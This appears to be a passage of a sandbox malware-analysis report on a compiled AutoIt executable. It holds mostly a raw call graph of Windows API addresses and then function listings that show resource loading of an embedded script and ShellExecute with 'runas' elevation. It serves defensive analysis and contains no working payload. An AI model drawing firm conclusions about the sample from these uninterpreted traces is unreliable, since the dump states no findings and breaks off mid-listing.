7ff7bb7e9d99 96192->96193 96193->96083 96195 7ff7bb7e6d74 LoadLibraryA 96194->96195 96196 7ff7bb7e6490 96194->96196 96195->96196 96197 7ff7bb7e6d89 GetProcAddress 96195->96197 96196->96097 96196->96098 96197->96196 96199 7ff7bb8147fc 96198->96199 96200 7ff7bb81482a 96199->96200 96203 7ff7bb81485c 96199->96203 96259 7ff7bb8155d4 15 API calls abort 96200->96259 96202 7ff7bb81482f 96260 7ff7bb81b164 31 API calls _invalid_parameter_noinfo 96202->96260 96205 7ff7bb81486f 96203->96205 96206 7ff7bb814862 96203->96206 96247 7ff7bb81feb4 96205->96247 96261 7ff7bb8155d4 15 API calls abort 96206->96261 96208 7ff7bb7e64cf 96208->96103 96208->96104 96211 7ff7bb814890 96254 7ff7bb820304 96211->96254 96212 7ff7bb814883 96262 7ff7bb8155d4 15 API calls abort 96212->96262 96215 7ff7bb8148a3 96263 7ff7bb80df60 LeaveCriticalSection 96215->96263 96401 7ff7bb7e6d1c 96217->96401 96220 7ff7bb7e6cf1 96222 7ff7bb7e64f7 96220->96222 96223 7ff7bb7e6d0f FreeLibrary 96220->96223 96221 7ff7bb7e6d1c 2 API calls 96221->96220 96224 7ff7bb7e6580 96222->96224 96223->96222 96225 7ff7bb804c68 4 API calls 96224->96225 96226 7ff7bb7e65b5 memcpy_s 96225->96226 96227 7ff7bb7e6740 CreateStreamOnHGlobal 96226->96227 96228 7ff7bb82c9f5 96226->96228 96237 7ff7bb7e6602 96226->96237 96229 7ff7bb7e6759 FindResourceExW 96227->96229 96227->96237 96405 7ff7bb862e00 45 API calls 96228->96405 96229->96237 96231 7ff7bb82c97e LoadResource 96232 7ff7bb82c997 SizeofResource 96231->96232 96231->96237 96235 7ff7bb82c9ae LockResource 96232->96235 96232->96237 96233 7ff7bb7e67d8 45 API calls 96233->96237 96234 7ff7bb82c9fd 96236 7ff7bb7e67d8 45 API calls 96234->96236 96235->96237 96238 7ff7bb7e66e8 96236->96238 96237->96231 96237->96233 96237->96234 96237->96238 96238->96111 96240 7ff7bb7e67f7 96239->96240 96243 7ff7bb82ca6c 96239->96243 96406 7ff7bb814c5c 96240->96406 96244 7ff7bb86240c 96425 7ff7bb862200 96244->96425 96246 7ff7bb862430 96246->96119 96264 7ff7bb81b9bc EnterCriticalSection 96247->96264 96249 7ff7bb81fecb 96250 7ff7bb81ff54 18 API calls 96249->96250 96251 7ff7bb81fed6 96250->96251 96252 7ff7bb81ba10 _isindst LeaveCriticalSection 96251->96252 96253 7ff7bb814879 96252->96253 96253->96211 96253->96212 96265 7ff7bb820040 96254->96265 96257 7ff7bb82035e 96257->96215 96259->96202 96260->96208 96261->96208 96262->96208 96270 7ff7bb82007d try_get_function 96265->96270 96267 7ff7bb8202de 96284 7ff7bb81b164 31 API calls _invalid_parameter_noinfo 96267->96284 96269 7ff7bb82021a 96269->96257 96277 7ff7bb827738 96269->96277 96276 7ff7bb820211 96270->96276 96280 7ff7bb80db68 37 API calls 4 library calls 96270->96280 96272 7ff7bb820277 96272->96276 96281 7ff7bb80db68 37 API calls 4 library calls 96272->96281 96274 7ff7bb82029a 96274->96276 96282 7ff7bb80db68 37 API calls 4 library calls 96274->96282 96276->96269 96283 7ff7bb8155d4 15 API calls abort 96276->96283 96285 7ff7bb826d04 96277->96285 96280->96272 96281->96274 96282->96276 96283->96267 96284->96269 96286 7ff7bb826d28 96285->96286 96287 7ff7bb826d40 96285->96287 96339 7ff7bb8155d4 15 API calls abort 96286->96339 96287->96286 96289 7ff7bb826d6d 96287->96289 96296 7ff7bb827348 96289->96296 96290 7ff7bb826d2d 96340 7ff7bb81b164 31 API calls _invalid_parameter_noinfo 96290->96340 96294 7ff7bb826d39 96294->96257 96342 7ff7bb827078 96296->96342 96299 7ff7bb8273bc 96374 7ff7bb8155b4 15 API calls abort 96299->96374 96300 7ff7bb8273d3 96362 7ff7bb81e418 96300->96362 96304 7ff7bb8273f7 CreateFileW 96308 7ff7bb8274eb GetFileType 96304->96308 96312 7ff7bb827469 96304->96312 96305 7ff7bb8273df 96376 7ff7bb8155b4 15 API calls abort 96305->96376 96309 7ff7bb8274f8 GetLastError 96308->96309 96317 7ff7bb827549 96308->96317 96379 7ff7bb815564 15 API calls 2 library calls 96309->96379 96310 7ff7bb8273e4 96377 7ff7bb8155d4 15 API calls abort 96310->96377 96311 7ff7bb8274b8 GetLastError 96378 7ff7bb815564 15 API calls 2 library calls 96311->96378 96312->96311 96318 7ff7bb827478 CreateFileW 96312->96318 96314 7ff7bb826d95 96314->96294 96341 7ff7bb81e3f4 LeaveCriticalSection 96314->96341 96381 7ff7bb81e334 16 API calls 2 library calls 96317->96381 96318->96308 96318->96311 96319 7ff7bb8273c1 96375 7ff7bb8155d4 15 API calls abort 96319->96375 96320 7ff7bb827507 CloseHandle 96320->96319 96321 7ff7bb827539 96320->96321 96380 7ff7bb8155d4 15 API calls abort 96321->96380 96324 7ff7bb827568 96325 7ff7bb8275b5 96324->96325 96382 7ff7bb827284 67 API calls 2 library calls 96324->96382 96330 7ff7bb8275ec 96325->96330 96383 7ff7bb826de4 67 API calls 4 library calls 96325->96383 96326 7ff7bb82753e 96326->96319 96329 7ff7bb8275e8 96329->96330 96331 7ff7bb8275fe 96329->96331 96384 7ff7bb8204b8 96330->96384 96331->96314 96333 7ff7bb827681 CloseHandle CreateFileW 96331->96333 96334 7ff7bb8276cb GetLastError 96333->96334 96335 7ff7bb8276f9 96333->96335 96399 7ff7bb815564 15 API calls 2 library calls 96334->96399 96335->96314 96337 7ff7bb8276d8 96400 7ff7bb81e548 16 API calls 2 library calls 96337->96400 96339->96290 96340->96294 96343 7ff7bb8270a4 96342->96343 96347 7ff7bb8270be 96342->96347 96344 7ff7bb8155d4 _get_daylight 15 API calls 96343->96344 96343->96347 96345 7ff7bb8270b3 96344->96345 96346 7ff7bb81b164 _invalid_parameter_noinfo 31 API calls 96345->96346 96346->96347 96349 7ff7bb82713b 96347->96349 96354 7ff7bb8155d4 _get_daylight 15 API calls 96347->96354 96348 7ff7bb82718c 96350 7ff7bb812554 31 API calls 96348->96350 96358 7ff7bb8271ec 96348->96358 96349->96348 96351 7ff7bb8155d4 _get_daylight 15 API calls 96349->96351 96352 7ff7bb8271e8 96350->96352 96353 7ff7bb827181 96351->96353 96355 7ff7bb82726b 96352->96355 96352->96358 96356 7ff7bb81b164 _invalid_parameter_noinfo 31 API calls 96353->96356 96357 7ff7bb827130 96354->96357 96359 7ff7bb81b184 _invalid_parameter_noinfo 16 API calls 96355->96359 96356->96348 96360 7ff7bb81b164 _invalid_parameter_noinfo 31 API calls 96357->96360 96358->96299 96358->96300 96361 7ff7bb827280 96359->96361 96360->96349 96363 7ff7bb81b9bc _isindst EnterCriticalSection 96362->96363 96364 7ff7bb81e43b 96363->96364 96365 7ff7bb81e464 96364->96365 96370 7ff7bb81e4c2 EnterCriticalSection 96364->96370 96373 7ff7bb81e487 96364->96373 96367 7ff7bb81e170 16 API calls 96365->96367 96366 7ff7bb81ba10 _isindst LeaveCriticalSection 96368 7ff7bb81e52a 96366->96368 96369 7ff7bb81e469 96367->96369 96368->96304 96368->96305 96371 7ff7bb81e310 wprintf EnterCriticalSection 96369->96371 96369->96373 96372 7ff7bb81e4d1 LeaveCriticalSection 96370->96372 96370->96373 96371->96373 96372->96364 96373->96366 96374->96319 96375->96314 96376->96310 96377->96319 96378->96319 96379->96320 96380->96326 96381->96324 96382->96325 96383->96329 96385 7ff7bb81e604 31 API calls 96384->96385 96386 7ff7bb8204cc 96385->96386 96387 7ff7bb8204d2 96386->96387 96389 7ff7bb82050c 96386->96389 96392 7ff7bb81e604 31 API calls 96386->96392 96388 7ff7bb81e548 16 API calls 96387->96388 96391 7ff7bb820534 96388->96391 96389->96387 96390 7ff7bb81e604 31 API calls 96389->96390 96393 7ff7bb820518 CloseHandle 96390->96393 96394 7ff7bb820560 96391->96394 96397 7ff7bb815564 fread_s 15 API calls 96391->96397 96395 7ff7bb8204ff 96392->96395 96393->96387 96396 7ff7bb820525 GetLastError 96393->96396 96394->96314 96398 7ff7bb81e604 31 API calls 96395->96398 96396->96387 96397->96394 96398->96389 96399->96337 96400->96335 96402 7ff7bb7e6ce3 96401->96402 96403 7ff7bb7e6d2c LoadLibraryA 96401->96403 96402->96220 96402->96221 96403->96402 96404 7ff7bb7e6d41 GetProcAddress 96403->96404 96404->96402 96405->96234 96409 7ff7bb814c7c 96406->96409 96410 7ff7bb814ca6 96409->96410 96421 7ff7bb7e680a 96409->96421 96411 7ff7bb814cd7 96410->96411 96413 7ff7bb814cb5 __scrt_fastfail 96410->96413 96410->96421 96424 7ff7bb80df54 EnterCriticalSection 96411->96424 96422 7ff7bb8155d4 15 API calls abort 96413->96422 96416 7ff7bb814cca 96423 7ff7bb81b164 31 API calls _invalid_parameter_noinfo 96416->96423 96421->96244 96422->96416 96423->96421 96428 7ff7bb8147bc 96425->96428 96427 7ff7bb862210 96427->96246 96431 7ff7bb814724 96428->96431 96432 7ff7bb814732 96431->96432 96433 7ff7bb814746 96431->96433 96439 7ff7bb8155d4 15 API calls abort 96432->96439 96435 7ff7bb814742 96433->96435 96441 7ff7bb81bef8 6 API calls __crtLCMapStringW 96433->96441 96435->96427 96436 7ff7bb814737 96440 7ff7bb81b164 31 API calls _invalid_parameter_noinfo 96436->96440 96439->96436 96440->96435 96441->96435 96443 7ff7bb7f1c5f 96442->96443 96444 7ff7bb7f1a48 96442->96444 96443->96122 96450 7ff7bb7f1a90 96444->96450 96459 7ff7bb805114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96444->96459 96450->96122 96454 7ff7bb7ef1ce 96453->96454 96456 7ff7bb7ef1d8 96453->96456 96455 7ff7bb7f1a30 45 API calls 96454->96455 96455->96456 96456->96132 96457->96130 96458->96125 96460->96145 96461->96150 96462->96144 96463->96151 96464->96154 96465->96166 96466->96164 96469 7ff7bb862bae 96467->96469 96468 7ff7bb7e67d8 45 API calls 96468->96469 96469->96468 96470 7ff7bb86240c 32 API calls 96469->96470 96471 7ff7bb8629da 96469->96471 96470->96469 96471->96171 96471->96184 96473 7ff7bb861d71 96472->96473 96474 7ff7bb861d61 96472->96474 96476 7ff7bb861dbf 96473->96476 96477 7ff7bb8148e0 89 API calls 96473->96477 96487 7ff7bb861d7a 96473->96487 96475 7ff7bb8148e0 89 API calls 96474->96475 96475->96473 96499 7ff7bb862038 96476->96499 96478 7ff7bb861d9e 96477->96478 96478->96476 96480 7ff7bb861da7 96478->96480 96480->96487 96511 7ff7bb814970 96480->96511 96481 7ff7bb861df5 96482 7ff7bb861e1c 96481->96482 96483 7ff7bb861df9 96481->96483 96488 7ff7bb861e4a 96482->96488 96489 7ff7bb861e2a 96482->96489 96485 7ff7bb861e07 96483->96485 96486 7ff7bb814970 62 API calls 96483->96486 96485->96487 96490 7ff7bb814970 62 API calls 96485->96490 96486->96485 96487->96184 96503 7ff7bb861e88 96488->96503 96491 7ff7bb861e38 96489->96491 96493 7ff7bb814970 62 API calls 96489->96493 96490->96487 96491->96487 96494 7ff7bb814970 62 API calls 96491->96494 96493->96491 96494->96487 96495 7ff7bb861e68 96495->96487 96498 7ff7bb814970 62 API calls 96495->96498 96496 7ff7bb861e52 96496->96495 96497 7ff7bb814970 62 API calls 96496->96497 96497->96495 96498->96487 96500 7ff7bb862069 96499->96500 96501 7ff7bb862056 memcpy_s 96499->96501 96502 7ff7bb814c5c _fread_nolock 45 API calls 96500->96502 96501->96481 96502->96501 96504 7ff7bb861fb0 96503->96504 96508 7ff7bb861eaa 96503->96508 96507 7ff7bb861fd3 96504->96507 96525 7ff7bb812a04 60 API calls 2 library calls 96504->96525 96506 7ff7bb861bd0 45 API calls 96506->96508 96507->96496 96508->96504 96508->96506 96508->96507 96523 7ff7bb861c9c 45 API calls 96508->96523 96524 7ff7bb8620cc 60 API calls 96508->96524 96512 7ff7bb81498e 96511->96512 96513 7ff7bb8149a3 96511->96513 96527 7ff7bb8155d4 15 API calls abort 96512->96527 96520 7ff7bb81499e 96513->96520 96526 7ff7bb80df54 EnterCriticalSection 96513->96526 96516 7ff7bb814993 96528 7ff7bb81b164 31 API calls _invalid_parameter_noinfo 96516->96528 96517 7ff7bb8149b9 96519 7ff7bb8148ec 60 API calls 96517->96519 96521 7ff7bb8149c2 96519->96521 96520->96487 96522 7ff7bb80df60 fread_s LeaveCriticalSection 96521->96522 96522->96520 96523->96508 96524->96508 96525->96507 96527->96516 96528->96520 96530 7ff7bb828f90 wcsftime 96529->96530 96531 7ff7bb7e3ec4 GetLongPathNameW 96530->96531 96532 7ff7bb7e7cf4 4 API calls 96531->96532 96533 7ff7bb7e3eed 96532->96533 96534 7ff7bb7e4074 96533->96534 96535 7ff7bb7e9640 4 API calls 96534->96535 96536 7ff7bb7e408e 96535->96536 96537 7ff7bb7e56d4 5 API calls 96536->96537 96538 7ff7bb7e409b 96537->96538 96539 7ff7bb82bada 96538->96539 96540 7ff7bb7e40a7 96538->96540 96545 7ff7bb82bb0f 96539->96545 96581 7ff7bb801ad0 CompareStringW 96539->96581 96542 7ff7bb7e4680 4 API calls 96540->96542 96543 7ff7bb7e40b5 96542->96543 96577 7ff7bb7e40e8 96543->96577 96546 7ff7bb7e40cb Concurrency::wait 96546->96055 96548 7ff7bb7e6460 105 API calls 96547->96548 96549 7ff7bb7e63e5 96548->96549 96550 7ff7bb82c656 96549->96550 96551 7ff7bb7e6460 105 API calls 96549->96551 96552 7ff7bb862948 90 API calls 96550->96552 96553 7ff7bb7e6400 96551->96553 96554 7ff7bb82c66e 96552->96554 96553->96550 96555 7ff7bb7e6408 96553->96555 96556 7ff7bb82c672 96554->96556 96557 7ff7bb82c690 96554->96557 96559 7ff7bb7e6414 96555->96559 96560 7ff7bb82c67b 96555->96560 96561 7ff7bb7e652c 63 API calls 96556->96561 96558 7ff7bb804c68 4 API calls 96557->96558 96576 7ff7bb82c6dd Concurrency::wait 96558->96576 96582 7ff7bb7ee774 143 API calls Concurrency::wait 96559->96582 96583 7ff7bb85c5c8 77 API calls wprintf 96560->96583 96561->96560 96564 7ff7bb82c68a 96564->96557 96565 7ff7bb7e6438 96565->96049 96566 7ff7bb82c895 96567 7ff7bb7e652c 63 API calls 96566->96567 96575 7ff7bb82c8a9 96567->96575 96572 7ff7bb7eec00 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 96572->96576 96575->96566 96589 7ff7bb8576d8 77 API calls 3 library calls 96575->96589 96576->96566 96576->96572 96576->96575 96584 7ff7bb857400 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 96576->96584 96585 7ff7bb85730c 39 API calls 96576->96585 96586 7ff7bb860210 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 96576->96586 96587 7ff7bb7eb26c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 96576->96587 96588 7ff7bb7e9940 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 96576->96588 96578 7ff7bb7e4107 96577->96578 96580 7ff7bb7e4130 memcpy_s 96577->96580 96579 7ff7bb804c68 4 API calls 96578->96579 96579->96580 96580->96546 96581->96539 96582->96565 96583->96564 96584->96576 96585->96576 96586->96576 96587->96576 96588->96576 96589->96575 96591 7ff7bb7e988d 96590->96591 96592 7ff7bb7e9762 96590->96592 96591->96060 96592->96591 96593 7ff7bb804c68 4 API calls 96592->96593 96595 7ff7bb7e9791 96593->96595 96594 7ff7bb804c68 4 API calls 96599 7ff7bb7e981c 96594->96599 96595->96594 96599->96591 96602 7ff7bb7eabe0 81 API calls 2 library calls 96599->96602 96603 7ff7bb7e9940 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 96599->96603 96604 7ff7bb7eb26c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 96599->96604 96600->96063 96601->96065 96602->96599 96603->96599 96604->96599 96605->96075 96606 7ff7bb83e263 96607 7ff7bb83e271 96606->96607 96625 7ff7bb7f2680 96606->96625 96607->96607 96608 7ff7bb7f2856 96609 7ff7bb7f29c8 PeekMessageW 96609->96625 96610 7ff7bb7f26da GetInputState 96610->96609 96610->96625 96612 7ff7bb83d181 TranslateAcceleratorW 96612->96625 96613 7ff7bb7f2a33 PeekMessageW 96613->96625 96614 7ff7bb7f2a1f TranslateMessage DispatchMessageW 96614->96613 96615 7ff7bb7f28b9 timeGetTime 96615->96625 96616 7ff7bb83d2bb timeGetTime 96639 7ff7bb802ac0 CharUpperBuffW RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 96616->96639 96621 7ff7bb7f66c0 300 API calls 96621->96625 96622 7ff7bb7f3c20 300 API calls 96622->96625 96623 7ff7bb8634e4 77 API calls 96623->96625 96625->96608 96625->96609 96625->96610 96625->96612 96625->96613 96625->96614 96625->96615 96625->96616 96625->96621 96625->96622 96625->96623 96626 7ff7bb7f2b70 96625->96626 96633 7ff7bb802de8 96625->96633 96638 7ff7bb7f2e30 300 API calls 2 library calls 96625->96638 96640 7ff7bb863a28 VariantClear RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 96625->96640 96641 7ff7bb87a320 300 API calls Concurrency::wait 96625->96641 96627 7ff7bb7f2b96 96626->96627 96630 7ff7bb7f2ba9 96626->96630 96642 7ff7bb7f2050 96627->96642 96629 7ff7bb7f2b9e 96629->96625 96662 7ff7bb8634e4 77 API calls 3 library calls 96630->96662 96632 7ff7bb83e55c 96634 7ff7bb802e0d 96633->96634 96635 7ff7bb802e2a 96633->96635 96634->96625 96635->96634 96636 7ff7bb802e5b IsDialogMessageW 96635->96636 96637 7ff7bb849d94 GetClassLongPtrW 96635->96637 96636->96634 96636->96635 96637->96635 96637->96636 96638->96625 96639->96625 96640->96625 96641->96625 96643 7ff7bb7f3c20 300 API calls 96642->96643 96653 7ff7bb7f20a8 96643->96653 96644 7ff7bb7f212d 96644->96629 96645 7ff7bb83d06f 96667 7ff7bb8634e4 77 API calls 3 library calls 96645->96667 96647 7ff7bb83d08d 96648 7ff7bb7f2552 96650 7ff7bb804c68 4 API calls 96648->96650 96649 7ff7bb83d036 96665 7ff7bb7eee20 5 API calls Concurrency::wait 96649->96665 96658 7ff7bb7f23cb memcpy_s 96650->96658 96652 7ff7bb804c68 4 API calls 96656 7ff7bb7f22a5 memcpy_s 96652->96656 96653->96644 96653->96645 96653->96648 96654 7ff7bb7f2244 96653->96654 96653->96656 96653->96658 96654->96658 96663 7ff7bb7f1ce4 301 API calls Concurrency::wait 96654->96663 96655 7ff7bb83d062 96666 7ff7bb7eee20 5 API calls Concurrency::wait 96655->96666 96656->96652 96656->96658 96658->96649 96660 7ff7bb8634e4 77 API calls 96658->96660 96664 7ff7bb7e4a60 300 API calls 96658->96664 96660->96658 96662->96632 96663->96656 96664->96658 96665->96655 96666->96645 96667->96647 96668 7ff7bb7f2bf8 96671 7ff7bb7eed44 96668->96671 96670 7ff7bb7f2c05 96672 7ff7bb7eed75 96671->96672 96679 7ff7bb7eedcd 96671->96679 96673 7ff7bb7f3c20 300 API calls 96672->96673 96672->96679 96675 7ff7bb7eeda8 96673->96675 96677 7ff7bb7eedfe 96675->96677 96680 7ff7bb7eee20 5 API calls Concurrency::wait 96675->96680 96676 7ff7bb83a636 96677->96670 96679->96677 96681 7ff7bb8634e4 77 API calls 3 library calls 96679->96681 96680->96679 96681->96676

                                                                                                                    Executed Functions

                                                                                                                    Function 00007FF7BB7E37B0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 145windowCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • GetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF7BB7E3785), ref: 00007FF7BB7E37F2
                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00007FF7BB7E3785), ref: 00007FF7BB7E3807
                                                                                                                    • GetFullPathNameW.KERNEL32(?,?,?,?,?,00007FF7BB7E3785), ref: 00007FF7BB7E388D
                                                                                                                      • Part of subcall function 00007FF7BB7E3F9C: GetFullPathNameW.KERNEL32(D000000000000000,00007FF7BB7E38BF,?,?,?,?,?,00007FF7BB7E3785), ref: 00007FF7BB7E3FFD
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF7BB7E3785), ref: 00007FF7BB7E3924
                                                                                                                    • MessageBoxA.USER32 ref: 00007FF7BB82B888
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF7BB7E3785), ref: 00007FF7BB82B8E1
                                                                                                                    • GetForegroundWindow.USER32(?,?,?,?,?,00007FF7BB7E3785), ref: 00007FF7BB82B968
                                                                                                                    • ShellExecuteW.SHELL32 ref: 00007FF7BB82B98F
                                                                                                                      • Part of subcall function 00007FF7BB7E3B84: GetSysColorBrush.USER32 ref: 00007FF7BB7E3B9E
                                                                                                                      • Part of subcall function 00007FF7BB7E3B84: LoadCursorW.USER32 ref: 00007FF7BB7E3BAE
                                                                                                                      • Part of subcall function 00007FF7BB7E3B84: LoadIconW.USER32 ref: 00007FF7BB7E3BC3
                                                                                                                      • Part of subcall function 00007FF7BB7E3B84: LoadIconW.USER32 ref: 00007FF7BB7E3BDC
                                                                                                                      • Part of subcall function 00007FF7BB7E3B84: LoadIconW.USER32 ref: 00007FF7BB7E3BF5
                                                                                                                      • Part of subcall function 00007FF7BB7E3B84: LoadImageW.USER32 ref: 00007FF7BB7E3C21
                                                                                                                      • Part of subcall function 00007FF7BB7E3B84: RegisterClassExW.USER32 ref: 00007FF7BB7E3C85
                                                                                                                      • Part of subcall function 00007FF7BB7E3CBC: CreateWindowExW.USER32 ref: 00007FF7BB7E3D0C
                                                                                                                      • Part of subcall function 00007FF7BB7E3CBC: CreateWindowExW.USER32 ref: 00007FF7BB7E3D5F
                                                                                                                      • Part of subcall function 00007FF7BB7E3CBC: ShowWindow.USER32 ref: 00007FF7BB7E3D75
                                                                                                                      • Part of subcall function 00007FF7BB7E6258: Shell_NotifyIconW.SHELL32 ref: 00007FF7BB7E6350
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Load$IconWindow$CurrentDirectory$CreateFullNamePath$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell_Show
                                                                                                                    • String ID: This is a third-party compiled AutoIt script.$runas
                                                                                                                    • API String ID: 1593035822-3287110873
                                                                                                                    • Opcode ID: 3952ebee020ff551dd9b970e0e86bf8aed240aa896a8a003d38d5c5607345415
                                                                                                                    • Instruction ID: 29e547f50c1a73c773572df9da12aac677aaaa819b56a8d5d5ec59493dfdfa54
                                                                                                                    • Opcode Fuzzy Hash: 3952ebee020ff551dd9b970e0e86bf8aed240aa896a8a003d38d5c5607345415
                                                                                                                    • Instruction Fuzzy Hash: 3B71292191C68799EA20BB6CE8505B8A365BF67348FC0013BEE4D061BDDF7CE519C360
                                                                                                                    Function 00007FF7BB7E6580 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 208COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 352 7ff7bb7e6580-7ff7bb7e65fc call 7ff7bb804c68 call 7ff7bb7e6c98 call 7ff7bb805d00 359 7ff7bb7e6602-7ff7bb7e6606 352->359 360 7ff7bb7e6737-7ff7bb7e673a 352->360 363 7ff7bb7e660c-7ff7bb7e6617 call 7ff7bb815514 359->363 364 7ff7bb82ca03-7ff7bb82ca1e 359->364 361 7ff7bb7e6740-7ff7bb7e6753 CreateStreamOnHGlobal 360->361 362 7ff7bb82c9f5-7ff7bb82c9fd call 7ff7bb862e00 360->362 361->359 365 7ff7bb7e6759-7ff7bb7e6777 FindResourceExW 361->365 362->364 373 7ff7bb7e661b-7ff7bb7e664e call 7ff7bb7e67d8 363->373 374 7ff7bb82ca27-7ff7bb82ca60 call 7ff7bb7e6810 call 7ff7bb7e67d8 364->374 365->359 368 7ff7bb7e677d 365->368 372 7ff7bb82c97e-7ff7bb82c991 LoadResource 368->372 372->359 375 7ff7bb82c997-7ff7bb82c9a8 SizeofResource 372->375 382 7ff7bb7e6654-7ff7bb7e665f 373->382 383 7ff7bb7e66e8 373->383 385 7ff7bb7e66ee 374->385 394 7ff7bb82ca66 374->394 375->359 378 7ff7bb82c9ae-7ff7bb82c9ba LockResource 375->378 378->359 381 7ff7bb82c9c0-7ff7bb82c9f0 378->381 381->359 386 7ff7bb7e6661-7ff7bb7e666f 382->386 387 7ff7bb7e66ae-7ff7bb7e66b2 382->387 383->385 391 7ff7bb7e66f1-7ff7bb7e6715 385->391 392 7ff7bb7e6670-7ff7bb7e667d 386->392 387->383 388 7ff7bb7e66b4-7ff7bb7e66cf call 7ff7bb7e6810 387->388 388->373 395 7ff7bb7e6717-7ff7bb7e6724 call 7ff7bb804c24 * 2 391->395 396 7ff7bb7e6729-7ff7bb7e6736 391->396 397 7ff7bb7e6680-7ff7bb7e668f 392->397 394->391 395->396 401 7ff7bb7e66d4-7ff7bb7e66dd 397->401 402 7ff7bb7e6691-7ff7bb7e6695 397->402 404 7ff7bb7e66e3-7ff7bb7e66e6 401->404 405 7ff7bb7e6782-7ff7bb7e678c 401->405 402->374 403 7ff7bb7e669b-7ff7bb7e66a8 402->403 403->392 407 7ff7bb7e66aa 403->407 404->402 408 7ff7bb7e678e 405->408 409 7ff7bb7e6797-7ff7bb7e67a1 405->409 407->387 408->409 411 7ff7bb7e67a3-7ff7bb7e67ad 409->411 412 7ff7bb7e67ce 409->412 413 7ff7bb7e67c6 411->413 414 7ff7bb7e67af-7ff7bb7e67bb 411->414 412->372 413->412 414->397 415 7ff7bb7e67c1 414->415 415->413
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                    • String ID: AU3!$EA06$SCRIPT
                                                                                                                    • API String ID: 3051347437-2925976212
                                                                                                                    • Opcode ID: 3718b3354401d781ad32d34eacd2d54cda69a35946875b41d0d437c2bbb5cda4
                                                                                                                    • Instruction ID: a8e547601054d147a862996f88012c787503b1a9946786cfc46fe68f576b9ab0
                                                                                                                    • Opcode Fuzzy Hash: 3718b3354401d781ad32d34eacd2d54cda69a35946875b41d0d437c2bbb5cda4
                                                                                                                    • Instruction Fuzzy Hash: 9D91E372B1964185EB20EB6DD444A7CA7A8BF6BB84F814136DF5E477B9DF38E4048320
                                                                                                                    Function 00007FF7BB801D80 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 251COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
